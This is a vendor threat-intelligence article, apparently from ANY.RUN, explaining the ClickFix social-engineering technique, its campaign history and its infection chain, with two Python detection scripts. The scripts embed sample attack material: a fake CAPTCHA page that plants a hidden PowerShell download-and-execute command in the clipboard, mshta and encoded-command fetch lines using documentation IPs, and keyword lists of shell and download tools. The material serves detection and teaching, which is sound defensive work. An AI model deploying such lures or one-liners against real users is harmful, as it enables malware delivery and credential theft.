ClickFix is a sophisticated social engineering technique that tricks users into manually executing malicious commands on their devices. It masquerades as a "quick fix" for fake technical issues, CAPTCHA verifications, or error messages, often hijacking the clipboard to paste harmful PowerShell or terminal commands. This user-assisted approach helps it bypass traditional security controls, leading to infostealers like Lumma Stealer, RATs, and other malware.
ClickFix is a social engineering technique that exploits human behavior rather than software vulnerabilities, tricking users into executing malicious commands themselves.
It bypasses most conventional security controls. Because the attack produces no malicious file on disk in its initial stage and uses legitimate Windows utilities (LOLBins) for execution, static antivirus, email filters, and many EDR solutions do not detect it. Phishing-resistant MFA offers no protection either, since ClickFix targets the endpoint, not credentials.
Growth has been explosive. First identified in late 2023, ClickFix grew by over 500% in the first half of 2025 compared with the previous six months, making it the second most common attack vector globally and reflecting both its effectiveness and the low barrier to adoption for new threat actors.
Nation-state APT groups have adopted it. Within a 90-day window between October 2024 and January 2025, confirmed nation-state groups including Russia's APT28, North Korea's Kimsuky, and Iran's MuddyWater all incorporated ClickFix into their espionage operations — replacing traditional infection stages with this user-driven approach.
The payload spectrum is severe. ClickFix delivers infostealers (Lumma Stealer, Danabot, StealC), ransomware, remote access trojans (Quasar RAT, Latrodectus, NetSupport RAT), keyloggers, cryptominers, and custom nation-state implants. A single campaign may deploy multiple malware families simultaneously.
The technique is evolving and expanding. ClickFix has expanded from Windows-only to macOS targets, spawned variants like FileFix, and been commoditized through builder toolkits sold on criminal marketplaces. Supply chain amplification demonstrates its potential for large-scale impact from a single compromise.
Proactive intelligence is the most effective defense layer. Because ClickFix campaigns spin up new infrastructure rapidly and are designed to evade reactive detection, staying ahead requires continuous, real-time threat intelligence.
ANY.RUN's Threat Intelligence Feeds deliver fresh, low-noise ClickFix IOCs directly into SIEM and firewall systems in STIX/MISP format, hours before they reach most other threat intel sources, giving security teams the early warning they need to block campaigns before they reach end users. Threat Intelligence Lookup enables instant contextual investigation of suspicious indicators across 40+ parameters with direct links to sandbox execution sessions:
Malicious domain linked to ClickFix attacks
ClickFix is a social engineering technique used to deliver malware by tricking users into performing actions that appear to “fix” a technical problem. It emerged prominently around late 2023–early 2024 and surged in popularity throughout 2025. Instead of relying solely on exploits or malicious downloads, attackers manipulate users into manually executing commands, disabling protections, or launching malware themselves.
ClickFix campaigns often imitate CAPTCHA checks, browser errors, VPN issues, software update prompts, or corporate authentication pages. The result is a highly convincing attack chain that transforms ordinary employees into unwitting participants in malware deployment.
For businesses, ClickFix represents a dangerous shift in attacker tactics. It combines realistic social engineering with malware delivery methods that evade traditional defenses, increasing the likelihood of credential theft, ransomware deployment, data exfiltration, and long-term compromise.
The typical ClickFix interaction unfolds like this: the user visits a web page (either a compromised legitimate site or a purpose-built fake) and encounters a pop-up mimicking a familiar interface. This could be a Cloudflare Turnstile CAPTCHA, a Windows error dialog, a browser update prompt, or a Microsoft security alert. The page instructs the user to press Windows + R (opening the Run dialog), then Ctrl + V (pasting clipboard contents), and finally Enter. The malicious payload (often a PowerShell command or a mshta.exe / curl.exe call) has already been silently injected into the clipboard by JavaScript running on the page. The user simply completes the sequence, believing they are verifying their identity or resolving a technical issue.
This approach is psychologically effective for several reasons. Internet users have been conditioned over years to interact with CAPTCHAs and security prompts with minimal scrutiny; they are routine friction, not warning signs. The instructions feel technical enough to seem legitimate. And the urgency engineered into the prompt discourages careful reading. The technique exploits what security researchers call "verification fatigue."
Crucially, because no file is written to disk in the initial stage and no traditional exploit is triggered, ClickFix frequently evades conventional security controls including static antivirus, email filters, and many endpoint detection and response (EDR) solutions. The malicious payload is fetched and executed entirely in memory using legitimate Windows utilities — so-called Living-Off-the-Land Binaries (LOLBins) such as msbuild.exe, regasm.exe, certutil.exe, and powershell.exe.
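One check a practitioner can add on the web side, as an added example that is not part of the original article or of ANY.RUN's tooling: a Python triage script that scans a page's HTML and JavaScript for the combination that defines a ClickFix lure, namely a clipboard write, keystroke instructions (Win + R, Ctrl + V, Enter), command fragments hidden in string literals, encoding tricks such as String.fromCharCode, and CAPTCHA-style wording. The two pages embedded in the script are constructed for the example (one mimics a lure and uses the TEST-NET address 203.0.113.10, the other is an ordinary copy-to-clipboard button); the regexes and the scoring weights are assumptions, not a published rule set.

```python
"""Static triage of a web page for ClickFix lure characteristics.

Example code written for this article; the two pages below are constructed,
and the patterns and weights are assumptions rather than any vendor's rules.
"""
import re
from typing import Dict, List

# 1. A clipboard write is what plants the command (Stage 2 of the chain).
CLIPBOARD_API = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# 2. Keystroke instructions that route the clipboard into an execution surface.
KEY_INSTRUCTIONS = re.compile(
    r"win(dows)?(\s*key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|press\s+enter", re.I)
# 3. Command fragments that have no business inside a page's string literals.
COMMAND_KEYWORDS = re.compile(
    r"powershell|mshta|cmd(\.exe)?\s*/c|\bcurl\s|\biwr\b|\biex\b|-w\s+hidden|"
    r"encodedcommand|bash\s+-c|/bin/(ba)?sh", re.I)
# 4. Encoding tricks used to keep those fragments out of plain sight.
OBFUSCATION = re.compile(
    r"String\.fromCharCode|\batob\(|unescape\(|\\x[0-9a-f]{2}|\\u00[0-9a-f]{2}", re.I)
# 5. Human-verification wording that frames the instructions as routine.
LURE_TEXT = re.compile(
    r"not a robot|verify you are human|verification (id|steps)|turnstile|recaptcha", re.I)

STRING_LITERAL = re.compile(r"\"((?:[^\"\\]|\\.)*)\"|'((?:[^'\\]|\\.)*)'")
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
ALERT_THRESHOLD = 5


def decode_fromcharcode(text: str) -> str:
    """Replace String.fromCharCode(112,111,...) with the quoted string it builds."""
    def repl(m) -> str:
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE.sub(repl, text)


def string_literals(text: str) -> List[str]:
    """Collect single- and double-quoted literals, honouring escaped quotes."""
    return [dq or sq for dq, sq in STRING_LITERAL.findall(text)]


def score_page(html: str) -> Dict[str, object]:
    """Score one page; a lure needs several of the signals together, not one."""
    decoded = decode_fromcharcode(html)
    literals = string_literals(decoded)
    score, hits = 0, {}
    if CLIPBOARD_API.search(decoded):
        score += 2
        hits["clipboard_write"] = True
    if KEY_INSTRUCTIONS.search(decoded):
        score += 2
        hits["keystroke_instructions"] = True
    command_strings = [s for s in literals if COMMAND_KEYWORDS.search(s)]
    if command_strings:
        score += 3
        hits["command_strings"] = command_strings
    if OBFUSCATION.search(html):  # raw page: decoding above removed fromCharCode
        score += 1
        hits["obfuscation"] = True
    if LURE_TEXT.search(decoded):
        score += 1
        hits["lure_text"] = True
    return {"score": score, "suspicious": score >= ALERT_THRESHOLD, "hits": hits}


# Constructed lure page: a fake Turnstile widget whose click handler plants a
# PowerShell one-liner, then reveals Run-dialog instructions. 203.0.113.10 is a
# TEST-NET documentation address, not real infrastructure.
LURE_PAGE = r'''
<div class="cf-turnstile"><input type="checkbox" id="cb"> Verify you are human</div>
<ol id="steps" hidden>
  <li>Press Windows Key + R</li><li>Press CTRL + V</li><li>Press Enter</li>
</ol>
<script>
document.getElementById('cb').addEventListener('click', function () {
  var p = String.fromCharCode(112,111,119,101,114,115,104,101,108,108);
  var c = p + " -w hidden -c \"iwr http://203.0.113.10/v.txt | iex\" # I am not a robot - reCAPTCHA Verification ID: 4812";
  navigator.clipboard.writeText(c);
  document.getElementById('steps').hidden = false;
});
</script>
'''

# Constructed benign page: a legitimate copy-to-clipboard button for a coupon.
BENIGN_PAGE = r'''
<p>Your discount code: <code id="code">SAVE20</code> <button id="copy">Copy code</button></p>
<script>
document.getElementById('copy').addEventListener('click', function () {
  navigator.clipboard.writeText(document.getElementById('code').textContent);
});
</script>
'''

if __name__ == "__main__":
    for name, page in (("lure", LURE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, score_page(page))
```

The clipboard write alone is worth little (countless legitimate pages copy text on click); the score only crosses the threshold when the page also tells the user which keys to press and carries command syntax in its literals, which is exactly the combination a ClickFix lure cannot avoid. Running the decoded text through the literal extractor is what defeats the String.fromCharCode trick in the sample; a real deployment would also want to fetch and scan the scripts a page loads from other origins.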
Threat Intelligence Lookup lets you select sandbox sessions in which ClickFix attacks were detonated in real time, with the Sandbox performing the interactions the lure expects from the user. Use search parameters to narrow the results to specific attacks, for example those delivering a particular malware family:
threatName:"clickfix" AND threatName:"AsyncRAT"
ClickFix attack samples in Interactive Sandbox
ClickFix attack analysis in Interactive Sandbox
For organizations, ClickFix represents a qualitative shift in the threat environment. Traditional defenses are designed around detecting malicious files, suspicious network connections, and known exploit patterns. ClickFix sidesteps all three by making the human the attack surface.
Security controls are neutralized by design. Because the user executes the malicious command themselves, the action appears indistinguishable from a legitimate administrative task. Standard PowerShell execution logs may flag unusual scripts, but if users are executing commands copied from an attacker-controlled page, the initial trigger looks like voluntary user action. Phishing-resistant authentication mechanisms such as FIDO2 passkeys offer no protection, since ClickFix does not phish credentials at login; it compromises the endpoint directly, and any stored credentials or session tokens are harvested from it afterwards.
The payloads are severe. ClickFix is not a one-trick technique; it serves as a delivery mechanism for a wide spectrum of threats. Organizations that fall victim may face credential-stealing infostealers, ransomware, remote access trojans (RATs) that provide persistent backdoor access, keyloggers, cryptominers, and post-exploitation frameworks. In some documented campaigns, a single ClickFix infection chain has been observed dropping multiple distinct malware families simultaneously.
The attack surface is broad. ClickFix can reach employees through phishing emails, malvertising on legitimate websites, poisoned search results, compromised supplier or partner websites, and even legitimate cloud platforms abused as staging infrastructure. Any device with a browser and internet access is a potential entry point, which means remote workers, contractors, and employees using personal devices for work tasks are all within scope.
Nation-state actors raise the stakes. When espionage-grade threat groups such as APT28, Kimsuky, and MuddyWater adopt a technique, it signals that it is mature, reliable, and difficult to counter with conventional defenses.
Unlike many traditional malware campaigns, ClickFix attacks frequently target employees directly through believable business workflows. This makes them particularly dangerous in modern environments where users routinely interact with cloud services, remote access tools, collaboration platforms, and browser-based applications.
Even mature organizations may struggle because:
For SOC teams, ClickFix introduces additional detection challenges because the initial execution chain can appear similar to normal administrative behavior. The distinguishing signal is process lineage rather than the binary itself: a script host or LOLBin spawned by explorer.exe (the parent of the Run dialog) with a remote URL on its command line, moments after a browser session, is rare in legitimate administration.
ClickFix has demonstrated sector-agnostic reach, but some industries face concentrated exposure due to the nature of their data, their workforce behavior, and their position in threat actors' target lists.
Threatened sectors and industry-specific risks
ClickFix's rise has been remarkably rapid. Understanding its trajectory helps explain why it has become so deeply embedded in the threat landscape.
October 2023 – First observations. Security researchers record early instances of the technique in the wild, characterized by fake error dialogs instructing users to paste PowerShell commands.
March 2024 – Formal identification and naming. Proofpoint formally identifies and names the ClickFix technique after observing organized campaigns using it to deliver infostealers. The technique begins attracting broader research attention.
May 2024 – ClearFake integration. The ClearFake campaign, previously known for fake browser update lures on compromised WordPress sites, integrates ClickFix. Attackers deploy it alongside the EtherHiding technique using smart contracts on Binance's BNB Smart Chain to serve next-stage payloads, delivering Emmenhtal Loader and Lumma Stealer. This marks a significant escalation in technical sophistication.
August 2024 – SMOKESABER and reCAPTCHA lures. Group-IB documents a campaign using fake reCAPTCHA pages to deploy Lumma Stealer via a custom downloader they name SMOKESABER. ClickFix adoption accelerates sharply across multiple threat actor clusters.
October 2024 – APT28 adopts ClickFix. APT28 uses ClickFix in a phishing campaign mimicking a Google Spreadsheet. Victims who complete the fake reCAPTCHA step unknowingly establish an SSH tunnel and launch Metasploit, giving attackers backdoor access.
November 2024 – MuddyWater campaign targeting 39 organizations. TA450 (MuddyWater) sends phishing emails timed to coincide with Microsoft Patch Tuesday, impersonating security update alerts. At least 39 organizations — mostly in the Middle East — are targeted. Victims who follow the instructions install the legitimate remote management tool "Level," which is then abused for espionage and data exfiltration.
January–February 2025 – Kimsuky targets think tanks. North Korea's TA427 (Kimsuky) uses ClickFix in campaigns against think tanks focused on DPRK policy, spoofing Japanese diplomatic correspondence to reach targets in South Korea, Japan, and the United States.
March–April 2025 – Latrodectus campaigns via ClearFake. A new wave of Latrodectus malware delivery uses ClickFix with ClearFake infrastructure. The clipboard injection conceals the payload behind an innocuous-looking "Cloud Identificator: 2031" label, with the actual PowerShell command hidden in the clipboard data.
May 2025 – Attacks surge 517%. ESET's Threat Report documents a 517% increase in ClickFix attacks in the first half of 2025, making it the second most common attack vector globally, trailing only conventional phishing.
June–August 2025 – macOS expansion. Sophos and other researchers document ClickFix campaigns targeting macOS users with the MacSync infostealer, using User-Agent string detection to serve OS-specific lures. The technique is no longer a Windows-only concern.
2025–2026 – FileFix and builder commoditization. A variant called FileFix emerges, replacing the Windows Run dialog with the File Explorer address bar: the lure tells the user to paste a "file path" into an Explorer window (opened through the browser's file-upload dialog), and the pasted string is in fact a command that Explorer executes. Meanwhile, threat actors begin selling ClickFix "builders" — ready-made toolkits for generating weaponized landing pages — lowering the technical barrier to entry further and ensuring continued proliferation.
Common Infection Vectors
After initial compromise, malware may spread through:
Because ClickFix often serves as an initial access mechanism, the actual post-compromise behavior depends on the malware family deployed afterward.
The ClickFix infection chain operates in several distinct stages, each designed to minimize technical detection while maximizing the likelihood of user compliance. Stage 1 — Lure delivery. The user arrives at a malicious page through one of the vectors described above. The page renders a convincing fake interface: a Cloudflare Turnstile CAPTCHA, a Windows security dialog, a browser update notification, or a Microsoft 365 verification prompt. Visual design closely mimics legitimate interfaces.
Stage 2 — Clipboard injection. When the user interacts with the fake CAPTCHA or error dialog (clicking a button, checking a box, etc.), JavaScript on the page silently executes document.execCommand('copy') or equivalent clipboard API calls, writing a malicious command to the system clipboard.
Stage 3 — User-executed command. The page then instructs the user to open the Windows Run dialog (Win + R), paste the clipboard contents (Ctrl + V), and press Enter. Some campaigns use alternative execution surfaces: the browser address bar, a terminal prompt, or a PowerShell window opened via other means. In macOS-targeted campaigns, the Terminal application is used instead.
Stage 4 — First-stage payload. The pasted command is typically a short PowerShell one-liner, mshta.exe call, or curl.exe command that fetches a second-stage script from attacker-controlled infrastructure. This command runs entirely in memory — no malicious file is written to disk at this stage. Common LOLBins used include certutil.exe, mshta.exe, bitsadmin.exe, and regsvr32.exe.
Stage 5 — Payload delivery and execution. The fetched second-stage script downloads and executes the final malware payload. Obfuscation techniques are employed throughout: base64 encoding, bloated JSON variables to evade static analysis, blockchain-based payload hosting (EtherHiding), and DLL sideloading through legitimate signed executables. Malware may be injected into legitimate Windows processes such as explorer.exe or svchost.exe to blend with normal system activity.
Stage 6 — Post-compromise activity. The installed payload executes its primary mission: credential theft, keylogging, ransomware deployment, C2 beaconing for remote access, cryptocurrency mining, or data exfiltration. Infostealers typically harvest browser credentials, saved passwords, cryptocurrency wallet files, session cookies, and system information before transmitting via encrypted channels to command-and-control infrastructure.
A key technical strength of this chain is its minimal footprint during initial stages. The absence of file-based artifacts means traditional disk-scanning security tools have nothing to detect. By the time malware is resident on the system, it has often already established persistence through scheduled tasks, registry modifications, or injected processes.
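As an added illustration of the lineage-based detection that Stages 3 and 4 imply (this is example code written for this page, not ANY.RUN's or any vendor's detection logic), the following Python script scores constructed process-creation events modelled on Sysmon Event ID 1 fields. It raises the score for a script host or LOLBin spawned by explorer.exe, a remote fetch or hidden-window flag on the command line, a CAPTCHA-style decoy such as the "Cloud Identificator" label from the Latrodectus campaign, a -EncodedCommand payload (which it decodes before inspection), and a hex-encoded IP literal in host position of the kind seen in the sandbox session below. The sample events, the keyword lists and the weights are assumptions made for the example, and the IP addresses are documentation ranges (TEST-NET), not real infrastructure.

```python
"""Lineage-based triage of process-creation events for ClickFix-style execution.

Example code for this article, not any vendor's rule set. Events are dicts
modelled on Sysmon Event ID 1 fields; samples, keyword lists and weights are
assumptions, and the IPs are TEST-NET documentation addresses.
"""
import base64
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Script hosts and LOLBins a Run-dialog paste typically lands in.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "certutil.exe", "bitsadmin.exe", "regsvr32.exe"}
# The Run dialog is hosted by explorer.exe, so that parent marks an interactive paste.
INTERACTIVE_PARENTS = {"explorer.exe"}
REMOTE_FETCH = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|-urlcache|/transfer\b", re.I)
HIDDEN_FLAGS = re.compile(
    r"-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Decoy text appended so the pasted command reads like a CAPTCHA token.
DECOY = re.compile(r"not a robot|verification id|cloud identificator", re.I)
# A hex-encoded IPv4 literal in host position, e.g. http://0xcb00710a/...
HEX_IP_HOST = re.compile(r"(?<=://)0x[0-9a-f]{1,8}(?=[/:]|$)", re.I)
ALERT_THRESHOLD = 5


@dataclass
class Finding:
    score: int = 0
    reasons: List[str] = field(default_factory=list)
    decoded: Dict[str, object] = field(default_factory=dict)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a -EncodedCommand argument (base64 of UTF-16LE) if one is present."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_hex_ips(text: str) -> List[str]:
    """Turn 0x-prefixed host literals into dotted quads; mshta/curl resolve them as-is."""
    out = []
    for tok in HEX_IP_HOST.findall(text):
        value = int(tok, 16)
        if value < 2 ** 32:
            out.append(str(ipaddress.IPv4Address(value)))
    return out


def analyze(event: Dict[str, str]) -> Finding:
    """Score one event; several weak signals together make the ClickFix pattern."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    f = Finding()
    if image not in LOLBINS:
        return f
    if parent in INTERACTIVE_PARENTS:
        f.score += 2
        f.reasons.append(f"{image} spawned by {parent} (Run dialog / interactive shell)")
    inner = decode_encoded_command(cmd)
    if inner:
        f.score += 2
        f.reasons.append("-EncodedCommand payload decoded")
        f.decoded["encoded_command"] = inner
    text = cmd + " " + (inner or "")  # inspect the decoded script, not just the wrapper
    if REMOTE_FETCH.search(text):
        f.score += 2
        f.reasons.append("fetches remote content")
    if HIDDEN_FLAGS.search(text):
        f.score += 1
        f.reasons.append("hidden-window / policy-bypass flags")
    if DECOY.search(text):
        f.score += 2
        f.reasons.append("CAPTCHA-style decoy text in command line")
    ips = decode_hex_ips(text)
    if ips:
        f.score += 1
        f.reasons.append(f"hex-encoded IP literal resolves to {ips}")
        f.decoded["hex_ips"] = ips
    return f


def triage(events: List[Dict[str, str]], threshold: int = ALERT_THRESHOLD):
    """Return (index, Finding) for every event at or above the alert threshold."""
    alerts = []
    for i, ev in enumerate(events):
        f = analyze(ev)
        if f.score >= threshold:
            alerts.append((i, f))
    return alerts


def _b64_utf16(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode()


EXPLORER = r"C:\Windows\explorer.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example
    # Run-dialog paste: mshta pulls an HTA from a hex-encoded host literal
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": EXPLORER,
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" http://0xcb00710a/verify.hta'},
    # Run-dialog paste: one-liner with a decoy label after the command
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": 'powershell -w hidden -c "iwr http://198.51.100.7/s.txt | iex" # Cloud Identificator: 2031'},
    # Run-dialog paste: the same fetch hidden behind -EncodedCommand
    {"Image": PS, "ParentImage": EXPLORER,
     "CommandLine": "powershell.exe -nop -ep bypass -enc " + _b64_utf16("iex (iwr 'http://198.51.100.7/a.ps1')")},
    # Legitimate admin script launched from the shell: stays below threshold
    {"Image": PS, "ParentImage": EXPLORER, "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Unrelated process: ignored
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": EXPLORER, "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for i, f in triage(SAMPLE_EVENTS):
        print(f"event {i}: score={f.score} reasons={f.reasons} decoded={f.decoded}")
```

The explorer.exe parent is the load-bearing signal: the same PowerShell one-liner launched by a deployment agent or a scheduled task would lose those two points and, absent a decoy label, fall below the threshold. In a real deployment the score would be one input among several; correlating the event with a write to the user's RunMRU registry key (the Run dialog's history) and with a browser process active seconds earlier ties it back to the web lure rather than to an administrator's console.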
View this sandbox session to observe a typical ClickFix attack kill chain, payload, connections, and processes.
Fake “fix” provoking user to run PowerShell command
This is an example of a "fix-this" swindle persuading the user to run a command to complete a fake Windows update. If they follow the instructions, an mshta.exe process is launched that fetches its payload from an IP address written in hexadecimal notation (a "0x" prefix instead of the usual dotted quad). Windows resolves such literals normally, so the obfuscation costs the attacker nothing while hiding the address from casual inspection and naive string matching.
Malicious process with a suspicious IP address
It triggers a PowerShell command that drops an .exe file.
Malware delivered via PowerShell
It reads a specific registry key to check whether it is running inside a certain type of virtual machine, and it reads the BIOS version as a second anti-analysis check. Pay attention to the process OOBE-Maintenance.exe: it is a legitimate Windows file, yet it loads DLLs and performs suspicious actions including a sandbox check, which indicates that malicious code has been injected into it.
Malware gathers system information
So we can classify this sample as malicious, showing infostealer activity combined with anti-analysis checks.
Here we also see a malicious browser extension being dropped. Google Chrome has invested considerable effort in making credential theft harder for infostealers, but, unfortunately, infostealers have found ways around those protections.
Analyze suspicious files and downloads in the sandbox
Modern ClickFix campaigns move quickly, rotate infrastructure aggressively, and frequently reuse indicators across multiple attacks. Rapid intelligence access is critical for proactive defense.
Using Threat Intelligence Feeds for Early Detection
ANY.RUN's Threat Intelligence Feeds provide a real-time stream of malicious indicators — IPs, domains, URLs — extracted from live sandbox analyses of the latest threats across thousands of organizations. For ClickFix defense, TI Feeds deliver several critical advantages:
Using Threat Intelligence Lookup for Investigation and Hunting
ANY.RUN TI Lookup is a searchable threat intelligence portal drawing on data from millions of interactive sandbox sessions conducted by more than 600,000 security professionals. When a suspicious URL, domain, IP address, file hash, or PowerShell command pattern surfaces in an alert or incident, analysts can query TI Lookup across more than 40 parameters to immediately retrieve:
For ClickFix specifically, TI Lookup allows SOC analysts to investigate a suspicious domain or URL that appeared in a phishing report and instantly see whether it is associated with known ClickFix infrastructure, what malware families it has delivered, which campaigns it is linked to, and what other indicators share its fingerprint. This context transforms a single data point into an actionable intelligence picture within seconds.
destinationIP:"89.190.158.132"
ClickFix attack samples in Interactive Sandbox
Contextual data on a ClickFix-linked IP address:
Security awareness programs should specifically teach employees that legitimate IT departments rarely instruct users to paste commands into PowerShell or Run dialogs manually.
ClickFix represents a modern evolution of malware delivery techniques that prioritizes psychological manipulation over technical exploitation. By exploiting user trust and leveraging legitimate system tools, attackers can bypass traditional security layers and establish footholds inside corporate environments with alarming efficiency.
For organizations, the danger extends far beyond a single infected endpoint. ClickFix campaigns can lead to credential theft, ransomware deployment, operational disruption, data exposure, and long-term compromise.
Defending against this threat requires a combination of:
As attackers continue refining social engineering techniques, proactive visibility into emerging infrastructure and malware behavior becomes increasingly important for reducing business risk.
Trial TI Lookup to start gathering actionable threat intelligence on the malware that threatens your business sector and region: just sign up to ANY.RUN.